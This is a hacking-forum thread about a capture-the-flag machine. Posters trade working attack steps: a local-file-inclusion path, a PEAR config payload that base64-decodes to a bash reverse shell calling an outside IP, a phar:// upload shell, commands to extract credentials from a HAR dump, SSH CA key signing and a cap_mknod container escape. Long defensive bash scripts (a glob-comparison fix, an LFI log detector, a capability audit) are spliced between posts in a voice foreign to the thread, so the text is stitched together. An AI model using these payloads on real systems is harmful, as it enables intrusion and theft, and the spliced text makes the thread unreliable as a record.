Posts: 10
Threads: 0
Joined: Aug 2024
Well guys I have exceeded the DM limit on this platform so text me over discord for any queries
Peace!
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Reputation System Rules 5.1) You are not allowed to ask for, buy, sell, or trade reputation (You may ask after a deal is made, only exception)
Posts: 59
Threads: 1
Joined: Jun 2024
(Aug 04, 2024, 05:52 PM)JonathanC0mradeJames Wrote: Well guys I have exceeded the DM limit on this platform so text me over discord for any queries 
Peace!
What's your handle on discord?? I searched jonathanc0mradejames but I can't find you
Posts: 10
Threads: 0
Joined: Aug 2024
(Aug 04, 2024, 06:46 PM)4rrows Wrote: (Aug 04, 2024, 05:52 PM)JonathanC0mradeJames Wrote: Well guys I have exceeded the DM limit on this platform so text me over discord for any queries 
Peace!
What's your handle on discord?? I searched jonathanc0mradejames but I can't find you
jonathanc0mradejames
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Reputation System Rules 5.1) You are not allowed to ask for, buy, sell, or trade reputation (You may ask after a deal is made, only exception)
Posts: 148
Threads: 2
Joined: Oct 2023
Aug 04, 2024, 06:50 PM
(This post was last modified: Aug 04, 2024, 06:52 PM by peRd1.)
(Aug 04, 2024, 06:18 PM)gihimlek Wrote: (Aug 04, 2024, 04:38 PM)JonathanC0mradeJames Wrote: Step for root.
Do the following step as root in the container.
I would really appreciate if you guys give me reputation 
Thanks, where did you find the good key? Hehe, good.key. I guess it's gonna stick around being called like that forever. Haha.
Let me explain in a nutshell...
There are two paths to find out what is/which is, actually, the good.key - one way is intended and the other is unintended. Most of the people did the unintended.
Intended is regarding how to abuse the bash globbing on the command in the script where it is comparing the contents of your ca file with the specific ca-it file.
You can leak one char at a time the file. The script is broken but the vulnerability works. The script you should know which I'm talking about.. it's the one from /opt/
However, to do this you need zzinter user, and you need to find the correct principal to sign with the api. In order to logon with zzinter on the ssg host.
The unintended path is using docker abuse regarding cap_mknod - this step requires root on the docker container and proper user (e.g support) on the ssg host.
And you can search for files and leak out their content using a popular abuse technique to mount namespaces (google for that). There are a bunch of private keys and
you need to work around trying or (brute forcing) to see which one will work to sign it with and logon as root.
That's about it, over and out, there is already SO MUCH content on this box spilled inside this thread.
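The bash pitfall peRd1 refers to above is a comparison whose right-hand operand is unquoted, so bash treats it as a glob pattern instead of a literal string. The following is an added example written for this thread, not the /opt script from the box and not any poster's code; SECRET is a constructed placeholder standing in for the contents of a private file, and the function names are mine.

```bash
#!/usr/bin/env bash
# Added example: why an unquoted right-hand side of [[ == ]] turns a string
# comparison into a pattern match, and two ways to fix it.

# Constructed stand-in for a private file's contents (not a real key).
SECRET='-----BEGIN EXAMPLE-----ZmFrZQ==-----END EXAMPLE-----'

# Vulnerable form: inside [[ ]] the right-hand operand of == is unquoted, so
# bash interprets it as a glob. A caller-controlled value such as '-----BEGIN*'
# is reported as a match even though it is not equal to the secret, which is
# what lets a script like this be used as an oracle about the file's contents.
compare_vulnerable() {
    local candidate="$1"
    if [[ $SECRET == $candidate ]]; then echo match; else echo nomatch; fi
}

# Fixed form: quoting the right-hand side makes it a literal string, so only
# the exact contents compare equal and metacharacters lose their meaning.
compare_fixed() {
    local candidate="$1"
    if [[ $SECRET == "$candidate" ]]; then echo match; else echo nomatch; fi
}

# Alternative fix when two files are being compared rather than two strings:
# cmp compares bytes and never interprets patterns.
compare_files() {
    cmp -s "$1" "$2" && echo match || echo nomatch
}

# Self-check: a probe that is a pattern but not the secret must print
# "nomatch" from a safe comparison. If it prints "match", the script is
# usable as a character-by-character oracle.
audit() {
    local probe='-----BEGIN*'
    printf 'vulnerable: %s\n' "$(compare_vulnerable "$probe")"
    printf 'fixed:      %s\n' "$(compare_fixed "$probe")"
}

audit
```

Run it as `bash globcheck.sh`; the two lines it prints show the same probe being accepted by the unquoted comparison and rejected by the quoted one. ShellCheck reports the unquoted form as SC2053, which is the quickest way to find this construct in a script you maintain.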
Posts: 33
Threads: 3
Joined: Sep 2023
(Aug 04, 2024, 10:24 AM)mmkz Wrote: (Aug 04, 2024, 10:06 AM)gigi_plus Wrote: (Aug 04, 2024, 06:31 AM)glock05 Wrote: (Aug 04, 2024, 06:28 AM)Lucifer097 Wrote: (Aug 04, 2024, 06:14 AM)glock05 Wrote: help mine shell isn't rolled back
GET /index.php/?page=../../../../../../../../tmp/hello
listen with nc
visit /index.php/?page=../../../../../../../../tmp/hello
I still can't get the reverse shell. All I get is these warnings:
#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/php";s:8:"data_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/data";s:7:"www_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/www";s:7:"cfg_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cfg";s:7:"ext_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/ext";s:7:"doc_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/docs";s:8:"test_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/tests";s:9:"cache_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cache";s:12:"download_dir";s:123:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/download";s:8:"temp_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/temp";s:7:"bin_dir";s:114:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear";s:7:"man_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}}
Try this...
$ curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
$ unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
$ grep -o -P '.{0,30}pass.{0,30}' itrc.ssg.htb.har
"text": "user=msainristil&pass=...snipped...",
$ ssh msainristil@10.10.11.27
password: ...snipped...
so how da fug did you find that "c2f4813259cc57fab36b311c5058cf031cb6eb51.zip" ?
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Asking for reputation
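The requests quoted above (a `page=` parameter pointing at `../../../../tmp/...`) are exactly the shape a web-server access log records, so they are easy to flag after the fact. The following is an added example, not code from any post in this thread: a small detector run over constructed access-log lines. It goes beyond the single traversal case above and also flags percent-encoded traversal and PHP stream wrappers (`phar://`, `php://`, `data://`, ...) in the same parameter; the log lines, IP addresses and function names are all made up for the example.

```bash
#!/usr/bin/env bash
# Added example: flag access-log requests whose "page" parameter carries
# directory traversal or a PHP stream wrapper. Sample lines are constructed.

SAMPLE_LOG='10.0.0.5 - - [04/Aug/2024:10:06:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [04/Aug/2024:10:06:14 +0000] "GET /index.php/?page=../../../../../../../../tmp/hello HTTP/1.1" 200 93
10.0.0.9 - - [04/Aug/2024:10:06:20 +0000] "GET /index.php?page=..%2F..%2F..%2Ftmp%2Fhello HTTP/1.1" 200 93
10.0.0.9 - - [04/Aug/2024:21:59:03 +0000] "GET /?page=phar://uploads/0dd174aa3b0eee562e627cc55bd394a917230298.zip/shell HTTP/1.1" 200 4096
10.0.0.7 - - [04/Aug/2024:22:01:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 640
10.0.0.9 - - [04/Aug/2024:22:02:44 +0000] "GET /index.php?page=php://filter/resource=index HTTP/1.1" 200 9801'

# A "page=" value that climbs directories (plain or percent-encoded) or that
# starts with a PHP stream wrapper, in either plain or percent-encoded form.
LFI_PATTERN='[?&]page=[^ "&]*(\.\.(/|%2[fF])|(phar|php|data|expect|zip|compress\.zlib)(://|%3[aA]%2[fF]%2[fF]))'

# Print every suspicious request line from the given files (or stdin).
flag_lfi_requests() {
    grep -Ei "$LFI_PATTERN" "$@"
}

# Number of suspicious requests, as a bare integer.
count_lfi_requests() {
    flag_lfi_requests "$@" | wc -l | tr -d ' '
}

# Per-source triage: "<count> <client ip>" for each client that sent a
# flagged request, most active client first.
flagged_sources() {
    flag_lfi_requests "$@" | awk '{ c[$1]++ } END { for (ip in c) print c[ip], ip }' | sort -rn
}

# Demonstration against the constructed log.
printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
printf '%s\n' "$SAMPLE_LOG" | flagged_sources
```

Point the functions at a real file with `flag_lfi_requests /var/log/apache2/access.log`; the pattern only inspects the query string, so an application that legitimately uses `page=` for plain names produces no hits, while the two request shapes discussed in this thread do.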
Posts: 4
Threads: 0
Joined: Jun 2024
I somehow can't manage to go from zzinter and root on itrc to support on ssg. Can anyone hint or tell me again how to do that? I think I am missing something.
Posts: 33
Threads: 3
Joined: Sep 2023
(Aug 04, 2024, 01:55 PM)osamy7593 Wrote: thinkphp is patched
ya seems the php reverse shell method described earlier in this thread does not work any longer.
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Asking for reputation
Posts: 33
Threads: 3
Joined: Sep 2023
(Aug 04, 2024, 09:59 PM)spamdegratis5 Wrote: (Aug 04, 2024, 09:48 PM)andy1 Wrote: (Aug 04, 2024, 01:55 PM)osamy7593 Wrote: thinkphp is patched
ya seems the php reverse shell method described earlier in this thread does not work any longer.
This works too. You need to zip a php shell and then access the file using phar:// filter
http://itrc.ssg.htb/?page=phar://uploads/0dd174aa3b0eee562e627cc55bd394a917230298.zip/shell
(Aug 04, 2024, 09:39 PM)andy1 Wrote: (Aug 04, 2024, 10:24 AM)mmkz Wrote: (Aug 04, 2024, 10:06 AM)gigi_plus Wrote: (Aug 04, 2024, 06:31 AM)glock05 Wrote: listen with nc
visit /index.php/?page=../../../../../../../../tmp/hello
I still can't get the reverse shell. All I get is these warnings:
#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/php";s:8:"data_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/data";s:7:"www_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/www";s:7:"cfg_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cfg";s:7:"ext_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/ext";s:7:"doc_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/docs";s:8:"test_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/tests";s:9:"cache_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cache";s:12:"download_dir";s:123:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/download";s:8:"temp_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/temp";s:7:"bin_dir";s:114:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear";s:7:"man_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}}
Try this...
$ curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
$ unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
$ grep -o -P '.{0,30}pass.{0,30}' itrc.ssg.htb.har
"text": "user=msainristil&pass=...snipped...",
$ ssh msainristil@10.10.11.27
password: ...snipped...
so how da fug did you find that "c2f4813259cc57fab36b311c5058cf031cb6eb51.zip" ? Most likely he obtained in a late step, accessing the database.
(Aug 04, 2024, 09:40 PM)metermike1338 Wrote: I somehow can't manage to go from zzinter and root on itrc to support on ssg. Can anyone hint or tell me again how to do that? I think I am missing something.
deRp1 already described the two ways to root this machine, and I've already posted the script to obtain the certificate, come on... at least do the effort.
https://book.hacktricks.xyz/linux-harden...#cap_mknod
small writeup
1. do the phar:// filter attack to obtain a foothold
2. [optional] search the database credentials and obtain the name of the zip file with the dump
3. with the filename obtained in the step 2 (or brute force), analyze the dump, the credentials for msainristil are there
4. with the ca private key in msainristil home folder, sign a keypair, using the principal zzinter (-n zzinter), claim your user flag
5. [optional] do the same as step 4 and create a keypair for principal root, you'll need it to exploit cap_mknod
6. use the script to sign a keypair for support principal
7. using the same curl request within the script in 6, sign a keypair for zzinter (you need to read the /etc/ssh files to obtain the correct principal for zzinter user)
8.1 you can choose here to do the intended way, just run the script I posted for globbing leak and obtain the certificate, sign a keypair for root and claim your flag
8.2 you can exploit cap_mknod here, using zzinter account in ssg (host) and itrc (container), you need to have access to root account in container to exploit it
How do you find the directory path to the zip and php shell after you upload it?
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Asking for reputation
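Step 8.2 above and the linked page turn on the container still holding CAP_MKNOD. Whether a container process actually has that capability is visible in the `CapEff` line of `/proc/self/status`, and the check is cheap to automate. The following is an added example, not the script from this thread: it decodes a capability mask, names the high-risk capabilities it contains, and prints the matching `docker run --cap-drop` flags. The bit numbers are the Linux capability numbers from `<linux/capability.h>`; the sample mask `00000000a80425fb` is Docker's default capability set, included so the script runs outside a container; the function names are mine.

```bash
#!/usr/bin/env bash
# Added example: report which high-risk Linux capabilities a container process
# holds, so CAP_MKNOD and similar can be dropped before anything relies on them.

# Success if bit $2 is set in the 64-bit hex mask $1 (the CapEff format).
cap_in_mask() {
    local mask="$1" bit="$2"
    [ "$(( (0x$mask >> $bit) & 1 ))" -eq 1 ]
}

# Names of the risky capabilities present in a mask, space separated.
# CAP_MKNOD (27) lets root in the container create device nodes; CAP_SYS_ADMIN
# (21) and CAP_SYS_MODULE (16) are broader escape primitives; the others are
# commonly dropped as well when the workload has no need for them.
risky_caps_in_mask() {
    local mask="$1" out="" entry bit name
    for entry in 2:CAP_DAC_READ_SEARCH 13:CAP_NET_RAW 16:CAP_SYS_MODULE \
                 19:CAP_SYS_PTRACE 21:CAP_SYS_ADMIN 27:CAP_MKNOD; do
        bit="${entry%%:*}"
        name="${entry#*:}"
        if cap_in_mask "$mask" "$bit"; then
            out="${out:+$out }$name"
        fi
    done
    printf '%s\n' "$out"
}

# Effective capability mask of the current process (Linux only).
current_capeff() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status
}

# Docker's default capability set, used when /proc is not available so the
# script still demonstrates the decoding (constant, not read from a host).
DOCKER_DEFAULT_CAPS=00000000a80425fb

# Human-readable audit of the current process plus the docker flags to fix it.
audit_container() {
    local mask cap
    if [ -r /proc/self/status ]; then
        mask="$(current_capeff)"
    else
        mask="$DOCKER_DEFAULT_CAPS"
        echo "no /proc/self/status here; auditing Docker's default mask instead"
    fi
    echo "CapEff: $mask"
    for cap in $(risky_caps_in_mask "$mask"); do
        echo "present: $cap  -> docker run --cap-drop=${cap#CAP_} ..."
    done
    if cap_in_mask "$mask" 27; then
        echo "CAP_MKNOD is present: root inside this container can create device nodes."
    fi
}

if [ "${1:-}" = "--audit" ]; then
    audit_container
fi
```

Run `bash capcheck.sh --audit` inside the container (as any user; the mask is per process) to see what it holds. Docker's default set keeps CAP_MKNOD and CAP_NET_RAW, which is why the audit of the sample mask lists both; `--cap-drop=ALL` followed by `--cap-add` for only what the workload needs is the usual least-privilege shape.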
Posts: 29
Threads: 3
Joined: Jul 2024
Hey guys.. I'm still a script kiddie so take it easy on me.. When I used gobuster to scan the domain I got /.hta, /.htaccess and /.htpasswd in the results. Is there a way I can steal those? I think they contain ssh keys or something.
Posts: 3
Threads: 0
Joined: Jun 2024
I already have the root user, how did you manage to escape the Docker container to get the root flag?